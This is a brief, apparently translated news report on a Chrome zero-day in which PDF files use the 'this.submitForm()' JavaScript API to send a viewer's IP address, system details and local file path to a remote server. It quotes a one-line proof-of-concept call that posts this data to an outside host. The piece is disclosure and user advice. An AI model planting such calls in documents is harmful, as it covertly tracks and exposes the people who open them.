Hackers using zero-day vulnerability on Chrome for tracking users

On February 26th, edgepot.io to publicly disclose the 0day vulnerability in Chrome that opens the pdf file can leak the user’s information. The successful exploitation of the vulnerability could cause the target user’s an IP address and other information to be leaked. “EdgeSpot has detected multiple PDF samples in the wild which exploit a Google Chrome zero-day flaw“. The vulnerability is more serious and has a greater impact.

“The root is the “this.submitForm()” PDF Javascript API. We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal information to google.com.”

 Information that may be leaked includes:

  • The public IP address of the user.
  • The operating system, Chrome version, etc. (in the HTTP POST header).
  • The full path to the PDF file on the user’s computer (in the HTTP POST payload).

Although information disclosure vulnerabilities do not directly implement code execution, there are still no small risks. Users are advised to use other PDF readers to view the received PDF documents locally until Chrome fixes the problem (Chrome claims to be fixed at the end of April) or disconnects the network when opening the PDF document in Chrome.